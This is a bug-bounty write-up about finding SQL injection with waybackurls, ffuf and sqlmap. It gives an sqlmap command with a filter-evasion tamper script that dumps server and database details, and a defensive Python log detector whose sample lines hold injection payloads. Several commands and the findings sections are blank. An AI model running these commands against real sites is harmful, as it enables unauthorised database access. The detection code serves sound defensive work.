How I Found multiple SQL Injection with FFUF and Sqlmap in a few minutes

Enumeration Phase:

I started by looking at the target's web archive with the waybackurls tool. I found a bunch of endpoints, and I noticed a lot of PHP files!! Mmmmm, maybe I'll find SQL injection in one of those. OK, let's filter the output. So my command will be:

uro is a tool used to delete duplicate URLs.

Getting Parameters:

Firstly, we need to grep only the lines that contain the string "get", delete everything before it, and make the output unique to avoid duplicates, so our command will be:

$ cat php-files.txt | grep -i get | sed 's/.*.get//' | sort -u

ffuf -w lowercase-parameters.txt -u ""
ffuf -w lowercase-parameters.txt -X POST -d "FUZZ=5" -u ""


The command will be:

sqlmap -r req3.txt -p commitment --force-ssl --level 5 --risk 3 --dbms="MYSQL" --hostname --current-user --current-db --dbs --tamper=between --no-cast
--level 5 --> level of tests to perform (1-5)
--risk 3 --> risk of tests to perform (1-3)
--dbms --> force the back-end DBMS value
--no-cast --> turn off the payload casting mechanism, so CAST-like statements are not used while fetching data
--tamper --> apply a tamper script to evade filters and WAFs
"--hostname --current-user --current-db --dbs" --> retrieve the server hostname, current user, current database and the list of databases
#1st SQLI
#2nd SQLI
#3rd SQLI
#4th SQLI
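From the defending side, the two phases above leave a recognisable footprint: the ffuf runs send one request per candidate parameter name against the same PHP script, and sqlmap's payloads (including the BETWEEN ... AND substitutions made by the between tamper) show up as SQL-shaped query values. The following script is an added example, not code from the write-up or from either tool; it parses constructed combined-format access log lines, flags a client that tries many distinct parameter names on one path within a short window, and flags query values matching common injection test shapes. The log lines, IP addresses and user agents are all constructed, and the detection deliberately keys on behaviour rather than on user-agent strings, which a tester can change freely.

```python
"""Spot ffuf-style parameter discovery and sqlmap-style probes in access logs.

Added defensive example (not from the original write-up). The log lines and
user agents below are constructed; detection relies on request behaviour
(many distinct parameter names per client and path, SQL-shaped query values)
rather than on tool user agents, which are trivially changed.
"""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

# Combined log format: ip ident user [time] "METHOD target HTTP/x" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Query-value shapes produced by common SQL injection test payloads, including the
# "BETWEEN x AND y" form that sqlmap's between tamper substitutes for = and > operators.
SQLI_PATTERNS = [
    ("between-tamper", re.compile(r"\b(?:NOT\s+)?BETWEEN\s+\S+\s+AND\s+\S+", re.I)),
    ("union-select", re.compile(r"\bUNION\b.*\bSELECT\b", re.I | re.S)),
    ("time-based", re.compile(r"\b(?:SLEEP|BENCHMARK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b", re.I)),
    ("boolean-tautology", re.compile(r"\b(?:OR|AND)\s+\d+\s*=\s*\d+", re.I)),
    ("quote-comment", re.compile(r"'\s*(?:--|#|/\*)")),
]


def parse_log_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    parts = urlsplit(m["target"])
    return {
        "ip": m["ip"],
        "time": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": parts.path,
        # percent-decoded (name, value) pairs; blank values kept so "FUZZ=" style probes count
        "params": parse_qsl(parts.query, keep_blank_values=True),
        "ua": m["ua"],
    }


def detect_param_fuzzing(entries, threshold=10, window_seconds=60):
    """Flag (client, path) pairs that use >= threshold distinct parameter names in one window."""
    by_key = defaultdict(list)
    for e in entries:
        by_key[(e["ip"], e["path"])].append(e)
    findings = []
    for (ip, path), group in by_key.items():
        group.sort(key=lambda e: e["time"])
        counts = defaultdict(int)   # parameter name -> requests in the current window
        left, peak = 0, 0
        for e in group:
            for name in {n for n, _ in e["params"]}:
                counts[name] += 1
            # slide the window's left edge forward until it spans at most window_seconds
            while (e["time"] - group[left]["time"]).total_seconds() > window_seconds:
                for name in {n for n, _ in group[left]["params"]}:
                    counts[name] -= 1
                    if counts[name] == 0:
                        del counts[name]
                left += 1
            peak = max(peak, len(counts))
        if peak >= threshold:
            findings.append({"ip": ip, "path": path, "distinct_params": peak,
                             "window_seconds": window_seconds})
    return findings


def detect_sqli_payloads(entries):
    """Flag requests whose decoded query values match an injection test shape."""
    findings = []
    for e in entries:
        for name, value in e["params"]:
            matched = [label for label, rx in SQLI_PATTERNS if rx.search(value)]
            if matched:
                findings.append({"ip": e["ip"], "path": e["path"], "param": name,
                                 "value": value, "patterns": matched})
    return findings


def analyze(log_text, threshold=10, window_seconds=60):
    entries = [e for e in map(parse_log_line, log_text.splitlines()) if e]
    return {"param_fuzzing": detect_param_fuzzing(entries, threshold, window_seconds),
            "sqli_payloads": detect_sqli_payloads(entries)}


def _line(ip, second, target, ua="constructed-ua/1.0"):
    """Build one constructed combined-format log line (sample data, not real traffic)."""
    return (f'{ip} - - [10/Mar/2024:12:00:{second:02d} +0000] '
            f'"GET {target} HTTP/1.1" 200 512 "-" "{ua}"')


FUZZED_NAMES = ["id", "page", "user", "q", "search", "cat", "item",
                "lang", "dir", "file", "view", "action"]
SAMPLE_LOG = "\n".join(
    # one client trying a different parameter name on the same PHP script every second
    [_line("203.0.113.7", i, f"/search.php?{name}=5") for i, name in enumerate(FUZZED_NAMES)]
    + [
        # ordinary visitors; an English phrase containing "between" must not trip the rule
        _line("192.0.2.10", 5, "/search.php?q=between+the+lines"),
        _line("192.0.2.11", 9, "/search.php?q=cats+and+dogs&page=2"),
        # SQL-shaped probes against the id parameter
        _line("198.51.100.4", 30, "/search.php?id=5%20AND%205%20BETWEEN%205%20AND%205"),
        _line("198.51.100.4", 31, "/search.php?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL--"),
    ]
)

if __name__ == "__main__":
    for kind, items in analyze(SAMPLE_LOG).items():
        print(kind)
        for item in items:
            print("  ", item)
```

On the sample data the fuzzing rule fires once (the 203.0.113.7 client, 12 distinct names on /search.php) and the payload rule fires twice, both for 198.51.100.4, while the "between the lines" search stays clean. One caveat matters for the POST variant of the ffuf command above: a standard access log records only the request line, so POST-body parameter fuzzing is invisible to this check unless request bodies are logged at the application or WAF layer.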



Mahmoud Youssef

Cyber Security Researcher | Bug Hunter